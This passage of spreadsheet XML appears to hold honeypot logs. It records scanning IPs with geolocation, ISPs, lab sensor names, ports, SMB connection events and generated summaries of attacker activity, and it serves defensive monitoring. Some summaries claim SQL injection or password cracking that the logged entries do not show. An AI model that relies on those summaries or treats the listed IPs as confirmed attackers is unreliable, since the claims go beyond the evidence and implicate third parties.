(180.222.175.86,56092)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56398)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56603)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56698)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56800)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56903)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56998)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57082)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57373)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57489)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57587)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57676)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57878)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57980)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58087)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58175)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58360)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58441)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58555)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58654)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58767)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58867)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58977)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59072)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59183)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59290)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59380)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59483)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59577)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56352)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56378)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57128)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57205)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50124)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50313)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57613)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57679)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:b4de:af56</t>
  </si>
  <si>
    <t>055ef5eff6d7de315a726a8deb27fa1f</t>
  </si>
  <si>
    <t>94.72.105.39</t>
  </si>
  <si>
    <t>vmi2304972.contaboserver.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>Portsmouth</t>
  </si>
  <si>
    <t>2639996</t>
  </si>
  <si>
    <t>PO5</t>
  </si>
  <si>
    <t>50.8198</t>
  </si>
  <si>
    <t>-1.08798</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,58511)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,58627)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,59575)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,65142)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,64640)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,64784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,57943)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,63641)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,63730)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,65379)}</t>
  </si>
  <si>
    <t>::ffff:5e48:6927</t>
  </si>
  <si>
    <t>b06a106a9ab1ea74aa39f471d91e545b</t>
  </si>
  <si>
    <t>103.58.66.211</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>Chennai (Venkatesapuram Colony)</t>
  </si>
  <si>
    <t>13.0962</t>
  </si>
  <si>
    <t>80.2335</t>
  </si>
  <si>
    <t>134032</t>
  </si>
  <si>
    <t>INFONET COMM ENTERPRISES</t>
  </si>
  <si>
    <t>Infonet Comm Enterprises</t>
  </si>
  <si>
    <t>Imperial Communication Entrepreneurs PVT LTD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,54523)}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,55942)}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,51800)}</t>
  </si>
  <si>
    <t>::ffff:673a:42d3</t>
  </si>
  <si>
    <t>The activity observed in the logs suggests that an attacker is attempting to probe and exploit various network services and systems, potentially for unauthorized access or data exfiltration. The attacker appears to be using automated tools to scan and test different protocols, including TCP/IP, DNS, FTP, HTTP, HTTPS, IMAP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, PostgreSQL, RDP, Redis, SIP, SMB, SMTP, SNMP, and others. The attacker is likely scanning for open ports and services to identify potential vulnerabilities and entry points. &amp;&amp; The attackers are attempting to scan and exploit various services on the network. They are sending probe requests to different ports, trying to identify open services and potential vulnerabilities. The requests include attempts to connect to printers, databases, file shares, and other services using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMTP, SNMP, SMB, SIP, and others.</t>
  </si>
  <si>
    <t>Some specific observations include: &amp;&amp; Some of the specific attempts include:</t>
  </si>
  <si>
    <t>62591855646344e91f1f617124338b65</t>
  </si>
  <si>
    <t>59.0.135.26</t>
  </si>
  <si>
    <t>Gwangju (Jebong-ro)</t>
  </si>
  <si>
    <t>35.1518</t>
  </si>
  <si>
    <t>126.919</t>
  </si>
  <si>
    <t>::ffff:3b00:871a</t>
  </si>
  <si>
    <t>99b87867089d350c2a325528ca749a6f</t>
  </si>
  <si>
    <t>69.145.168.166</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-069-145-168-166.res.spectrum.com</t>
  </si>
  <si>
    <t>Montana</t>
  </si>
  <si>
    <t>Missoula</t>
  </si>
  <si>
    <t>5666639</t>
  </si>
  <si>
    <t>59801</t>
  </si>
  <si>
    <t>46.8501</t>
  </si>
  <si>
    <t>-113.987</t>
  </si>
  <si>
    <t>33588</t>
  </si>
  <si>
    <t>Charter Communications LLC</t>
  </si>
  <si>
    <t>::ffff:4591:a8a6</t>
  </si>
  <si>
    <t>08dfc02420a152e3f7c6c1e9cefce138</t>
  </si>
  <si>
    <t>109.236.169.105</t>
  </si>
  <si>
    <t>Milan</t>
  </si>
  <si>
    <t>3173435</t>
  </si>
  <si>
    <t>45.4643</t>
  </si>
  <si>
    <t>9.18951</t>
  </si>
  <si>
    <t>211391</t>
  </si>
  <si>
    <t>MITAN-AS</t>
  </si>
  <si>
    <t>Mitan Telematica S.r.l.</t>
  </si>
  <si>
    <t>Mitan Telematica S.r.l</t>
  </si>
  <si>
    <t>GET</t>
  </si>
  <si>
    <t>{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:6dec:a969</t>
  </si>
  <si>
    <t>The malicious activity appears to be reconnaissance and potential exploitation of vulnerable services, with the attackers attempting to gather information about the target systems and networks, and possibly exploiting any open ports or misconfigured services. &amp;&amp; The attacker is probing and exploiting various services on the network, attempting to gain unauthorized access or obtain sensitive information.</t>
  </si>
  <si>
    <t>481a61e33227a5cc27bbabb69ca9cd39</t>
  </si>
  <si>
    <t>88.204.168.182</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>IP Babina</t>
  </si>
  <si>
    <t>2005-12-01</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63243)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57067)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57606)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,61727)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,62386)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,52411)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,52954)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,64062)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,64412)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57369)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57911)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,54936)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,55526)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63183)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63593)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,59855)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,60389)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,50024)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,50721)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,61628)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,62019)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,53334)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,53773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:58cc:a8b6</t>
  </si>
  <si>
    <t>The activity indicates a reconnaissance phase by the attacker, where they are scanning and probing various services to identify vulnerabilities and potential entry points into the network.</t>
  </si>
  <si>
    <t xml:space="preserve">Scanning and probing for vulnerabilities </t>
  </si>
  <si>
    <t>05b04e829f57826fe30667351df1126f</t>
  </si>
  <si>
    <t>220.133.122.127</t>
  </si>
  <si>
    <t>220-133-122-127.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;27753&amp;&amp;58677&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc85:7a7f</t>
  </si>
  <si>
    <t>3820fd2bee763fcba76cc595f7e622be</t>
  </si>
  <si>
    <t>85.206.116.137</t>
  </si>
  <si>
    <t>23&amp;&amp;40704&amp;&amp;6035&amp;&amp;NA</t>
  </si>
  <si>
    <t>08126</t>
  </si>
  <si>
    <t>54.7013</t>
  </si>
  <si>
    <t>25.2601</t>
  </si>
  <si>
    <t>8764</t>
  </si>
  <si>
    <t>Telia Lietuva, AB</t>
  </si>
  <si>
    <t>Telia Lietuva</t>
  </si>
  <si>
    <t>2005-01-13</t>
  </si>
  <si>
    <t>::ffff:55ce:7489</t>
  </si>
  <si>
    <t>3c26c8d8daad5de0ba24503651b6dd10</t>
  </si>
  <si>
    <t>139.167.70.136</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;389&amp;&amp;22&amp;&amp;9100&amp;&amp;443&amp;&amp;6956</t>
  </si>
  <si>
    <t>::ffff:8ba7:4688</t>
  </si>
  <si>
    <t>0a4325f3cc88dca00eec2b726a6faebf</t>
  </si>
  <si>
    <t>78.31.255.245</t>
  </si>
  <si>
    <t>NA&amp;&amp;78-31-255-245.static.kviknet.net</t>
  </si>
  <si>
    <t>DK</t>
  </si>
  <si>
    <t>Denmark</t>
  </si>
  <si>
    <t>83</t>
  </si>
  <si>
    <t>South Denmark</t>
  </si>
  <si>
    <t>Kolding Kommune</t>
  </si>
  <si>
    <t>Kolding</t>
  </si>
  <si>
    <t>2618528</t>
  </si>
  <si>
    <t>6000</t>
  </si>
  <si>
    <t>55.5352</t>
  </si>
  <si>
    <t>9.48586</t>
  </si>
  <si>
    <t>204151</t>
  </si>
  <si>
    <t>EWII Bredbaand A/S</t>
  </si>
  <si>
    <t>EWII Bredbaand</t>
  </si>
  <si>
    <t>::ffff:4e1f:fff5</t>
  </si>
  <si>
    <t>4aa38f1dd94a4d67171b4421a19c5dfb</t>
  </si>
  <si>
    <t>1.235.163.74</t>
  </si>
  <si>
    <t>::ffff:1eb:a34a</t>
  </si>
  <si>
    <t>d08cb8e50e111ddc09ae7672f3a16b6d</t>
  </si>
  <si>
    <t>171.245.88.68</t>
  </si>
  <si>
    <t>::ffff:abf5:5844</t>
  </si>
  <si>
    <t>297b46dfa3af1469541293b724f24c5f</t>
  </si>
  <si>
    <t>71.247.218.25</t>
  </si>
  <si>
    <t>40.7831</t>
  </si>
  <si>
    <t>-73.9713</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:47f7:da19</t>
  </si>
  <si>
    <t>abd099f7c8a9ac1efc8627cd83d31b60</t>
  </si>
  <si>
    <t>187.210.23.98</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H28</t>
  </si>
  <si>
    <t>Miguel Hidalgo Borough</t>
  </si>
  <si>
    <t>Miguel Hidalgo</t>
  </si>
  <si>
    <t>3827408</t>
  </si>
  <si>
    <t>19.4341</t>
  </si>
  <si>
    <t>-99.2002</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,61327)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,61370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,52009)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,52048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,50422)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,50451)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:bbd2:1762</t>
  </si>
  <si>
    <t>3065a206f50e1045bcec1bcdbc34a04d</t>
  </si>
  <si>
    <t>103.110.36.198</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H2</t>
  </si>
  <si>
    <t>{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>Lucknow</t>
  </si>
  <si>
    <t>Lucknow (Gaurabagh)</t>
  </si>
  <si>
    <t>1264733</t>
  </si>
  <si>
    <t>226001</t>
  </si>
  <si>
    <t>26.922</t>
  </si>
  <si>
    <t>80.9672</t>
  </si>
  <si>
    <t>136652</t>
  </si>
  <si>
    <t>Bytel Tranet Private Limited</t>
  </si>
  <si>
    <t>Bytel TraNet Private Limited</t>
  </si>
  <si>
    <t>2018-02-26</t>
  </si>
  <si>
    <t>BYTEL</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.110.36.198,64398)}&amp;&amp;{Data_SMB:Incoming connection (103.110.36.198,64974)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:676e:24c6</t>
  </si>
  <si>
    <t>8f35ff6fd945f793983c2f39cbaaaea3</t>
  </si>
  <si>
    <t>164.163.61.91</t>
  </si>
  <si>
    <t>164-163-61-91.speedconecte.net.br&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>Campos de Júlio</t>
  </si>
  <si>
    <t>12978169</t>
  </si>
  <si>
    <t>-13.7245</t>
  </si>
  <si>
    <t>-59.2603</t>
  </si>
  <si>
    <t>265946</t>
  </si>
  <si>
    <t>SPEED CONECTE SERVICOS DE INTERNET LTDA - ME</t>
  </si>
  <si>
    <t>Speed Conecte Servicos De Internet Ltda - ME</t>
  </si>
  <si>
    <t>2020-11-16 00:00:00</t>
  </si>
  <si>
    <t>2025-11-16 00:00:00</t>
  </si>
  <si>
    <t>2020-11-19 00:00:00</t>
  </si>
  <si>
    <t>published</t>
  </si>
  <si>
    <t>::ffff:a4a3:3d5b</t>
  </si>
  <si>
    <t>3fe5339670096852e6d4240d1faa886a</t>
  </si>
  <si>
    <t>59.126.126.72</t>
  </si>
  <si>
    <t>59-126-126-72.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H22</t>
  </si>
  <si>
    <t>80&amp;&amp;23&amp;&amp;64518&amp;&amp;NA&amp;&amp;60663&amp;&amp;44030&amp;&amp;44043&amp;&amp;44059</t>
  </si>
  <si>
    <t>::ffff:3b7e:7e48</t>
  </si>
  <si>
    <t>It appears that an attacker is attempting to scan and exploit various network services, including web servers, databases, and other systems. The attacker seems to be using a range of techniques, including password guessing, SQL injection, and exploitation of vulnerabilities in specific software packages. &amp;&amp; Based on the logs, it appears that an attacker is scanning and probing various services for potential vulnerabilities. They are attempting to exploit these weaknesses by sending malicious requests and commands.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; The attacker's goal seems to be to gain unauthorized access to systems and networks, likely for malicious purposes such as data theft or ransomware attacks.</t>
  </si>
  <si>
    <t>3afdf3062ddee94279dc3434624a2484</t>
  </si>
  <si>
    <t>59.184.151.48</t>
  </si>
  <si>
    <t>::ffff:3bb8:9730</t>
  </si>
  <si>
    <t xml:space="preserve">The attacker is scanning for open services and probing various protocols to identify potential vulnerabilities. They are also attempting to gain unauthorized access by sending malicious requests, such as login attempts, password cracking, and data extraction. &amp;&amp; The attacker is attempting to scan and exploit various services on the network, using different protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. </t>
  </si>
  <si>
    <t xml:space="preserve">**Password Cracking Attempt** &amp;&amp;  </t>
  </si>
  <si>
    <t>2de3abdca72402a22599a8e37bd2c842</t>
  </si>
  <si>
    <t>147.185.132.233</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;51781&amp;&amp;52048&amp;&amp;53382&amp;&amp;52346&amp;&amp;54729&amp;&amp;1433&amp;&amp;80&amp;&amp;50334&amp;&amp;6667&amp;&amp;443&amp;&amp;55519&amp;&amp;56203&amp;&amp;56862&amp;&amp;55004&amp;&amp;1080</t>
  </si>
  <si>
    <t>GET&amp;&amp;NA&amp;&amp;connection&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:84e9</t>
  </si>
  <si>
    <t>The attacker is scanning the network for available services and attempting to exploit vulnerabilities in various systems, including web servers, databases, and other network devices. They are also trying to gain unauthorized access by sending malicious login attempts and exploiting weaknesses in authentication protocols.</t>
  </si>
  <si>
